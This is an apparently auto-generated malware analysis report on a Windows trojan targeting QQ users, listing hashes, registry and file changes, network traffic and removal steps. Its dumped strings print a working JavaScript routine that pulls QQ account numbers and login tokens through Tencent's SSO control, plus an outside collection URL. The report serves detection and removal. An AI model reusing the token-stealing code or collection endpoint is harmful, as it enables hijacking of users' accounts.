Trojan.Win32.FlyStudio_c9f101613b

by malwarelabrobot on March 18th, 2017 in Malware Descriptions.

Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan, Worm, EmailWorm

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: c9f101613b2b8c83e258f2cd9a13524e
SHA1: eb119de67c787b1608b5be7c1ebd697014918298
SHA256: c10839711810a1c3b722dcf54dc600e80572965e0ac51284fc22cf70e6ac130d
SSDeep: 24576:xgWheFi8AXOjJzcQ6vh8PhIL569TPaWEUbdSs uhwTS7:xgWhMAso5vh8PaQhEbTS
Size: 1466368 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171
Company: no certificate found
Created at: 2015-04-09 09:14:47
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour	Description
EmailWorm	Worm can send e-mails.

Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:3852

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:3852 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\qlogin[1].htm (800 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\AJFV5BC8.txt (89 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X66G0HIG\2409490842014111013118567[1].htm (41101 bytes)

Registry activity

The process %original file name%.exe:3852 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadDecisionTime" = "10 58 B5 F9 BB 9E D2 01"
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Multimedia\DrawDib]
"vga.drv 1916x902x32(BGR 0)" = "31,31,31,31"

[HKLM\SOFTWARE\Microsoft\Tracing\c9f101613b2b8c83e258f2cd9a13524e_RASMANCS]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}"

[HKLM\SOFTWARE\Microsoft\Tracing\c9f101613b2b8c83e258f2cd9a13524e_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\c9f101613b2b8c83e258f2cd9a13524e_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecision" = "3"

[HKLM\SOFTWARE\Microsoft\Tracing\c9f101613b2b8c83e258f2cd9a13524e_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadDecision" = "3"

"WpadNetworkName" = "Network 2"

[HKLM\SOFTWARE\Microsoft\Tracing\c9f101613b2b8c83e258f2cd9a13524e_RASMANCS]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionTime" = "10 58 B5 F9 BB 9E D2 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 38 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\c9f101613b2b8c83e258f2cd9a13524e_RASAPI32]
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 0A 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\c9f101613b2b8c83e258f2cd9a13524e_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\c9f101613b2b8c83e258f2cd9a13524e_RASAPI32]
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFavoritesInitialSelection"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFeedsInitialSelection"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: ??
Product Name: ??QQ????????
Product Version: 1.0.0.0
Legal Copyright: ?? ????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: QQ????????
Comments: ??QQ??????!
Language: English (United States)

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	646311	647168	4.51749	db562b266335aa493c9c76d7d1615a42
CODE	651264	338768	339968	4.57617	fb7dc939be45a9fe85f1d22181b2cd06
.rdata	991232	211654	212992	4.46426	69268c205267c12aa32bc861068a06ba
.data	1204224	324586	73728	3.39297	0d4ec8bc7d030d9715ca5e2a5d6882f8
DATA	1531904	69260	69632	5.14483	c25123d93051dc239b933062d22dc4e9
BSS	1601536	25785	28672	0	cf845a781c107ec1346e849c9dd1b7e8
.rsrc	1630208	87616	90112	3.72279	d919fcb65d0414798cb93a67989ff714

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://xui.ptlogin2.tencent-cloud.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=0&jumpname=&ptcss=&param=u1%3Dhttp%253A%252F%252Fwww.qq.com%252Fqq2012%252FloginSuccess.htm&css=&mibao_css=&low_login=0
hxxp://p21.tcdn.qq.com/ptlogin/ver/10202/js/xui.js?v=10007
hxxp://p21.tcdn.qq.com/ptlogin/v4/style/0/images/icons.gif
hxxp://blog.163.com/blog/static/2409490842014111013118567/
hxxp://blog.163.com/blog/static/2409490842015210103242809/
hxxp://skins12138.blog.163.com/blog/static/2409490842015210103242809/	115.238.126.134
hxxp://imgcache.qq.com/ptlogin/ver/10202/js/xui.js?v=10007	203.205.158.38
hxxp://imgcache.qq.com/ptlogin/v4/style/0/images/icons.gif	203.205.158.38
hxxp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=0&jumpname=&ptcss=&param=u1%3Dhttp%253A%252F%252Fwww.qq.com%252Fqq2012%252FloginSuccess.htm&css=&mibao_css=&low_login=0	203.205.142.186
hxxp://skins12138.blog.163.com/blog/static/2409490842014111013118567/	115.238.126.134
dns.msftncsi.com	131.107.255.255
teredo.ipv6.microsoft.com	157.56.120.207
log.wtlogin.qq.com	183.61.38.241

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /ptlogin/v4/style/0/images/icons.gif HTTP/1.1

Accept: */*

Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=0&jumpname=&ptcss=¶m=u1%3Dhttp%253A%252F%252FVVV.qq.com%252Fqq2012%252FloginSuccess.htm&css=&mibao_css=&low_login=0

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: imgcache.qq.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: X2S_Platform

Connection: keep-alive

Date: Fri, 17 Mar 2017 01:15:39 GMT

Cache-Control: max-age=2592000

Expires: Sun, 16 Apr 2017 01:15:39 GMT

Last-Modified: Mon, 16 Mar 2015 08:46:52 GMT

Content-Type: image/gif

Content-Length: 7902

X-NWS-LOG-UUID: 7ec810b2-a5ec-41b3-a520-f3116d577d9b

Keep-Alive: timeout=60

Vary:  Origin

X-Cache-Lookup: Hit From Disktank
GIF89as.r.................................................^....A......
.............! ............B.....}....................1)-t............
........j...........................................................c.
.>..p[E............z...........q.....u.....j.......................
..................Z.................b.................................
.................^................................!.......,....s.r....
.'..........X......'...............................X..................
...........X......................................)....Fz%.K.1.......*
\......#J.H.....3".........I.....'K.S..e..0..\).&..-m...RgO.3w..94(..F
..T.t...P.J.J.*..X...*....%Fr.K....h..].....p....KWn..x....p...'..\...
.... ^......#K.L.....3C..w..................@...c.....k..g....v.......
|....q ..{.....K...te...k..0...'....F......_.........O..............z.
...B.Y_:.....6.........ZP...b(a..n.!......!.8..".h..(..b.0....2.x..8..
..;>...@.._.D.i...&i`..q.1..PF)..P>Y..Db...\....^....Y.Y&.[..&._
....o....r....l.y..|......J....j(.5$...p\..gIzV..p.....f....v.....*...
.j.............".....j..<........... ....k...&....6...MD m...X...8.
...L.....;m.........n....n........ko...................0..$....7....G,
....`...< ........C ...$.l.....2.*[.2./.... ..2.7..3.;.,..<....=
.-t.H..t.L....PG-..TS...Xg...(t.5...$.....I......_....p{..._....(..w.|
....}..w...>.............G....W....d....w.y......].`..80 6.........
....n............../....o|..$..........Q..U...GF0....w...../.....o....
.........3 ....a..X.!A!K.....0...@......L......:......'H..Z.......<<< skipped >>>

GET /blog/static/2409490842014111013118567/ HTTP/1.1

Accept: */*

Referer: hXXp://skins12138.blog.163.com/blog/static/2409490842014111013118567/

Accept-Language: zh-cn

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: skins12138.blog.163.com

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 17 Mar 2017 01:15:44 GMT

Content-Type: text/html;charset=GBK

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

Set-Cookie: NTESBLOGSI=A04C0AAE51E7EE3D16B1DAF5D18CF749.yqblog13-8010; Domain=.blog.163.com; Path=/

Set-Cookie: usertrack=c 5 hljLOMAig1kJBs5JAg==; expires=Sat, 17-Mar-18 01:15:44 GMT; domain=.163.com; path=/

P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID"
b49..  <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "ht
tp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..  <html xmlns
="hXXp://VVV.w3.org/1999/xhtml" xml:lang="zh" lang="zh">..  <hea
d>..    <meta http-equiv="X-UA-Compatible" content="IE=7" />.
.    <meta http-equiv="content-type" content="text/html;charset=gbk
"/>..    <meta http-equiv="content-style-type" content="text/css
"/>..    <meta http-equiv="content-script-type" content="text/ja
vascript"/>..    <meta name="version" content="neblog-1.0"/>.
.    <script type="text/javascript">..      ..      ..      docu
ment.uniqueID!=document.uniqueID&&!!location.hash&&(location.hash=loca
tion.hash); ..      document.domain = location.hostname.replace(/^.*\.
([\w] \.[\w] )$/,'$1');..      window.focus();..      window.getMusicT
imeStamp=function(){return '5dc9af78bbc20fbd0150e0675ff893a8';};..    
..      //BLOG-647:....OS..............................      (function
(){..        window.setTimeout(function(){..          var _loginUserIc
on = document.getElementById('loginUserIcon');..          var _rsavata
rimg = document.getElementById('rsavatarimg');..          if(!!_loginU
serIcon){..            var _loaded1 = false;..            var _img1 = 
new Image();..            _img1.onload = function(){..                
_loaded1 = true;..                _img1.onload = null;..            };
..            _img1.src = _loginUserIcon.src;..            window.setT
imeout(function(){..              if(!_loaded1){..                <<< skipped >>>

GET /blog/static/2409490842015210103242809/ HTTP/1.1

Accept: */*

Referer: hXXp://skins12138.blog.163.com/blog/static/2409490842015210103242809/

Accept-Language: zh-cn

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: skins12138.blog.163.com

Cache-Control: no-cache

Cookie: NTESBLOGSI=A04C0AAE51E7EE3D16B1DAF5D18CF749.yqblog13-8010; usertrack=c 5 hljLOMAig1kJBs5JAg==


HTTP/1.1 404 Not Found

Server: nginx

Date: Fri, 17 Mar 2017 01:15:46 GMT

Content-Type: text/html;charset=GBK

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding
583..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
 "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<ht
ml xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>..    <met
a http-equiv="Content-type" content="text/html; charset=GBK">..    
<meta name="robots" content="noindex"> ..    <link href="http
://b.bst.126.net/style/common/error/404.css" type="text/css" rel="styl
esheet"/>..<title>........</title>..</head> ..<
;body>..<noscript><div>........................</div
></noscript>..<div class="g-doc">...<div class="g-hd
">....<div class="er-head bds0 bdwb bdc0">.....<h1 class="
icn0 icn0-0 bgc0"><a href="hXXp://blog.163.com/" class="notxt"&g
t;..........blog.163.com</a></h1>.....<div class="er-qu
ick fc1">......<a href="hXXp://blog.163.com/" class="fc1 ul">
........</a>...... | ......<a rel="nofollow" href="
hXXp://help.163.com/special/007525FT/blog.html" class="fc1 ul">....
</a>.....</div>....</div>...</div>...<div c
lass="g-bd">....<div class="er-cnt">.....<div class="er-fa
ce fs3 fc2">o. 0</div>.....<div class="er-detail">.....
.<h2 class="fs2 fc2">....</h2>......<div class="er-reas
on bgc1">.......<p class="fs1">..........................,...
.........................</p>.......<span class="er-arrow icn
0 icn0-1"></span>......</div>.....</div>....&<<< skipped >>>

GET /cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=0&jumpname=&ptcss=¶m=u1%3Dhttp%253A%252F%252FVVV.qq.com%252Fqq2012%252FloginSuccess.htm&css=&mibao_css=&low_login=0 HTTP/1.1

Accept: */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: xui.ptlogin2.qq.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Fri, 17 Mar 2017 01:15:37 GMT

Content-Type: text/html

Content-Length: 5476

Connection: keep-alive

Server: QZHTTP-2.38.41

P3P: CP="CAO PSA OUR"

Cache-Control: max-age=604800

Set-Cookie: pt_local_token=-542769849; PATH=/; DOMAIN=ptlogin2.qq.com;

Last-Modified: Thu, 08 Mar 2012 02:04:00 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmln
s="hXXp://VVV.w3.org/1999/xhtml"><head><meta http-equiv="C
ontent-Type" content="text/html; charset=utf-8">  <style type="t
ext/css">u{text-decoration:none}body{font-family:Tahoma,Verdana,Ari
al,......;font-size:12px;margin:0}.clear{clear:both;font-size:0;line-h
eight:0;height:0}#login{margin:0 auto;float:none;width:320px;padding:0
 0 10px 50px}.linemid{padding:10px 8px 0 30px;color:gray}.btn_gray,.bt
n_select{border:0;color:#2473A2;width:103px;height:28px;padding-left:2
px;cursor:pointer;font-weight:700;font-size:14px}.btn_select{backgroun
d:url(//imgcache.qq.com/ptlogin/v4/style/0/images/icons.gif) -102px -1
30px no-repeat}.btn_gray{background:url(//imgcache.qq.com/ptlogin/v4/s
tyle/0/images/icons.gif) -102px -225px no-repeat}#login #list_uin img{
padding:7px;background:url(//imgcache.qq.com/ptlogin/v4/style/0/images
/icons.gif) 0 -329px no-repeat}#list_uin li{list-style:none;padding:0 
0 0 28px; padding-left:12px;width:270px;word-wrap:break-word;min-heigh
t:20px;clear:both}#list_uin li input{float:left;margin-bottom:5px;widt
h:20px}#list_uin label{margin:2px 0 0 4px;float:left;width:220px}#logi
n p{padding:8px 15px 12px 32px;margin:0;font-size:12px;color:#535353}.
x_lowLogin{padding:10px 0 0 28px;display:none}</style>  <scri
pt>var g_begTime=new Date();..(function(){...window.onerror = funct
ion(msg,url,line){....var reportUrl = location.protocol == "https:<<< skipped >>>

GET /ptlogin/ver/10202/js/xui.js?v=10007 HTTP/1.1

Accept: */*

Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=0&jumpname=&ptcss=¶m=u1%3Dhttp%253A%252F%252FVVV.qq.com%252Fqq2012%252FloginSuccess.htm&css=&mibao_css=&low_login=0

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: imgcache.qq.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: X2S_Platform

Connection: keep-alive

Date: Fri, 17 Mar 2017 01:15:39 GMT

Cache-Control: max-age=604800

Expires: Fri, 24 Mar 2017 01:15:39 GMT

Last-Modified: Mon, 13 Mar 2017 08:35:12 GMT

Content-Type: application/x-javascript

Content-Length: 3460

Content-Encoding: gzip

X-NWS-LOG-UUID: 1cf7e165-ec73-49eb-b3dd-42d45240b1e9

Keep-Alive: timeout=60

Vary:  Origin

X-Cache-Lookup: Hit From Disktank Gz
...........Z.w.... X....,..i..q\'..........#.....w........O i.#''.F..4
3..4.2.m.......K.D...E`'....0q.2..n}....2..E.g..oE$G.....=.Ca..w.j..M.
..F5F@....u...O\...z.@...f...]Q.m6.....frq}.K.<}w~.K....H5.......%L
Wj...X.\..=5.>....29$....S......>T.*v.....vG...`.{..t...v.....&l
t;.".N.:.(wb.G....:....:..gO............1...r.......9H..cT.._.....Z.n.
p.....&...8t.0P......C....LN........._..;G.j.@s...15q.K...9.....././..
/.|pH#2....$.n..p{e..K...{,H.A#G9ql..u..ms....Z..A$N...r......y...O...
Uks.9D..(..X.l|...u.%1..@k.be....4i..j..fs.2_..l..W]..X%....E.*;W.b...
...3.|.D7.Ki>.hE....[-..."F.....?QA.sP....bn&R6.L...=^.Br...-.C....
....&~../...q.4..m...b.............W...... ..G....'.].b..=.QLb.<..A
p..A....".Iw..<.}8.....j:3Mk.AH...Pa... ....................a..?b./
....c...[.c./...r... ..C.T....V,..D4..9...&h....#|......WB.q......Y.b.
9n...........j='..w.(v.h.E...j..G.........F]....y...\.j.Q.y@1.W.....0-
.mj.......Z..Z.o.....8?..\>../t..d$g&.J........#.....9.2....Qq.,t!.
e.E..38d:..I....'{Got<>..QU..#....&..8.sF...C....".P.&h.!u.u...&
gt;@.......D...{. .....E4...|4.~........K....I.4....5...c...J.Qj.P3hFM
i..K.....w.F......*v...V..`T.^.>......2m.h.......p`(i..&2.-5..~..m.
.C..g...\...2n....t1.S.@...d.1...6..crw%..z.[.V.......OR2`...i..J.3ea.
1..................s..R.^.Q.p.d.R.s..k...c...........e...6F.!.'0.>.
b.|..x.4.|.4.^%`..Gf.=3.6...2O._.. 3n....:d...FG..Fa.Q...f....A.....^^
.N.L..~....bJ.J..d4.Gt@3..4.Z..e.j. ...Z<..g...$..-.../J. .......3.
]......e..I$7.q.S*t..t...../..KK.....x  ;..C.e 7.....-P/.....p./$&<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_3852:

.text

`.rdata

@.data

.rsrc

t$(SSh

~%UVW

u$SShe

kernel32.dll

$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)

oleaut32.dll

EVariantBadIndexError

u%CNu

MaxKeySize

Invalid key size

%UUUU1E

%UUUU3

5 passes)

1.2.3

DB00735E-CFFB-47E6-B060-BB0D74008B7A

94-401@163.com

Hw2.Hw

wininet.dll

ole32.dll

user32.dll

gdi32.dll

atl.dll

shlwapi.dll

HttpOpenRequestA

HttpSendRequestA

HttpQueryInfoA

MsgWaitForMultipleObjects

ShellExecuteA

&scope=0&view=1&daylist=undefined&uinlist=undefined&gid=&flag=1&filter=all&applist=all&refresh=0&firstGetGroup=0&icServerTime=1364288778&mixnocache=0&scene=0&begintime=0&count=15&dayspac=0&sidomain=cnc.qzonestyle.gtimg.cn&g_tk=

hXXp://ic2.s6.qzone.qq.com/cgi-bin/feeds/feeds2_html_more?uin=

key:'(.*?)',

showEbtn:'',

nickname:'(.*?)',

Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

http=

https

HTTP/1.1

Content-Type: application/x-www-form-urlencoded

HTTP/1.1

hXXps://

hXXp://

hXXp://w.qzone.qq.com/cgi-bin/likes/internal_dolike_app?g_tk=

/mood/

.1&curkey=http://user.qzone.qq.com/

&unikey=http://user.qzone.qq.com/

qzreferrer=http://user.qzone.qq.com/

0@hXXp://taotao.qq.com/cgi-bin/emotion_cgi_addcomment_ugc?g_tk=

&pfid=2&qz_ver=8&appcanvas=0&qz_style=1¶ms=&entertime=1382746831390&canvastype=&uin=

qzreferrer=http://ctc.qzs.qq.com/qzone/app/mood_v6/html/index.html?mood#uin=

%S4WD

hg%fpM

S.Ac9SR

0.I%3s

,wAe.kI

aiUy'4xu

%c*@j

.eH'y

{&%U)

lj%4U

xe%CNs

9F.cLe

hJK.ZH

O.qt0

KERNEL32.DLL

COMCTL32.dll

GDI32.dll

MSIMG32.dll

MSVCRT.dll

MSVFW32.dll

USER32.dll

SkinH_EL.dll

782843836

hXXp://ui.ptlogin2.qq.com/cgi-bin/login?appid=549000912&s_url=hXXp://qun.qzone.qq.com/group&style=12.com

ui.ptlogin2.qq.com

skey=@

Wp.Iw

A.zkt@

5p|%U

ù'p

hXXp://skins12138.blog.163.com/blog/static/2409490842014111013118567/

hXXp://skins12138.blog.163.com/blog/static/2409490842015210103242809/

Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)

WEBT

WinHttp.WinHttpRequest.5.1

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=0&jumpname=&ptcss=¶m=u1%3Dhttp%253A%252F%252FVVV.qq.com%252Fqq2012%252FloginSuccess.htm&css=&mibao_css=&low_login=0

document.body.innerHTML=GetuinKey();

function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g<f;g  ){var E=V.GetData(g);var P=E.GetDWord("dwSSO_Account_dwAccountUin");var U=E.GetStr("strSSO_Account_strNickName");var G=E.GetBuf("bufST_PTLOGIN");var A=G.GetSize();var N="";for(var Y=0;Y<A;Y  ){var B=G.GetAt(Y).toString("16");if(B.length==1){B="0" B};N =B};text =P '|' U '|' N ';'}}catch(b){}};return text};

&keyindex=9&pt_aid=549000912&daid=5&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&pt_qzone_sig=1&ptopt=1

&clientkey=

hXXp://ptlogin2.qq.com/jump?clientuin=

skey=

&Btn=æäº¤

hXXp://0cmz.xyz/index.php

VBScript.RegExp

@wininet.dll

F%*.*f

CNotSupportedException

commctrl_DragListMsg

Afx:%x:%x:%x:%x:%x

Afx:%x:%x

COMCTL32.DLL

CCmdTarget

__MSVCRT_HEAP_SELECT

RASAPI32.dll

iphlpapi.dll

SHLWAPI.dll

MPR.dll

WINMM.dll

WS2_32.dll

VERSION.dll

GetProcessHeap

WinExec

GetCPInfo

GetKeyState

GetKeyboardType

GetViewportOrgEx

WINSPOOL.DRV

RegCloseKey

RegOpenKeyExA

RegCreateKeyExA

ADVAPI32.dll

SHELL32.dll

OLEAUT32.dll

oledlg.dll

WSOCK32.dll

InternetCrackUrlA

InternetCanonicalizeUrlA

WININET.dll

CreateDialogIndirectParamA

UnhookWindowsHookEx

SetWindowsHookExA

SetViewportOrgEx

OffsetViewportOrgEx

SetViewportExtEx

ScaleViewportExtEx

GetViewportExtEx

comdlg32.dll

.PAVCException@@

.PAVCNotSupportedException@@

.PAVCFileException@@

(*.prn)|*.prn|

(*.*)|*.*||

Shell32.dll

Mpr.dll

Advapi32.dll

User32.dll

Gdi32.dll

Kernel32.dll

(&07-034/)7 '

?? / %d]

%d / %d]

: %d]

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV)|*.WAV|MIDI

(*.MID)|*.MID|

(*.txt)|*.txt|

(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG)|*.JPG|BMP

(*.BMP)|*.BMP|GIF

(*.GIF)|*.GIF|

(*.ICO)|*.ICO|

(*.CUR)|*.CUR|

%s:%d

windows

out.prn

%d.%d

%d / %d

%d/%d

Bogus message code %d

(%d-%d):

%ld%c

(*.htm;*.html)|*.htm;*.html

1.1.3

;3 #>6.&

'2, / 0&7!4-)1#

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

HTTP/1.0

%s <%s>

Reply-To: %s

From: %s

To: %s

Subject: %s

Date: %s

Cc: %s

%a, %d %b %Y %H:%M:%S

SMTP

VVV.dywt.com.cn

.PAVCOleException@@

.PAVCObject@@

.PAVCSimpleException@@

.PAVCMemoryException@@

.?AVCNotSupportedException@@

.PAVCResourceException@@

.PAVCUserException@@

.?AVCCmdTarget@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.PAVCOleDispatchException@@

.PAVCArchiveException@@

zcÁ

: NTESBLOGSI=A04C0AAE51E7EE3D16B1DAF5D18CF749.yqblog13-8010; Domain=.blog.163.com; Path=/

Set-Cookie: usertrack=c 5 hljLOMAig1kJBs5JAg==; expires=Sat, 17-Mar-18 01:15:44 GMT; domain=.163.com; path=/

P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID"

kins12138.blog.163.com/blog/static/2409490842014111013118567/

c:\%original file name%.exe

*.yUW

deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly

inflate 1.2.3 Copyright 1995-2005 Mark Adler

#include "l.chs\afxres.rc" // Standard components

1, 0, 6, 6

- Skin.dll

(*.*)

1.0.0.0

%original file name%.exe_3852_rwx_10000000_0003F000:

`.rsrc

L$(h%f

SSh0j

Gw2.Hw

msctls_hotkey32

TVCLHotKey

THotKey

\skinh.she

}uo,x6l5k%x-l h

9p%s m)t4`#b

e"m?c&y1`Ð<

SetViewportOrgEx

SetViewportExtEx

SetWindowsHookExA

UnhookWindowsHookEx

EnumThreadWindows

EnumChildWindows

`c%US.4/

!#$<#$#=

.text

`.rdata

@.data

.rsrc

@.UPX0

`.UPX1

`.reloc

hJK.ZH

O.qt0

KERNEL32.DLL

COMCTL32.dll

GDI32.dll

MSIMG32.dll

MSVCRT.dll

MSVFW32.dll

USER32.dll

SkinH_EL.dll

1, 0, 6, 6

- Skin.dll

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\qlogin[1].htm (800 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\AJFV5BC8.txt (89 bytes)
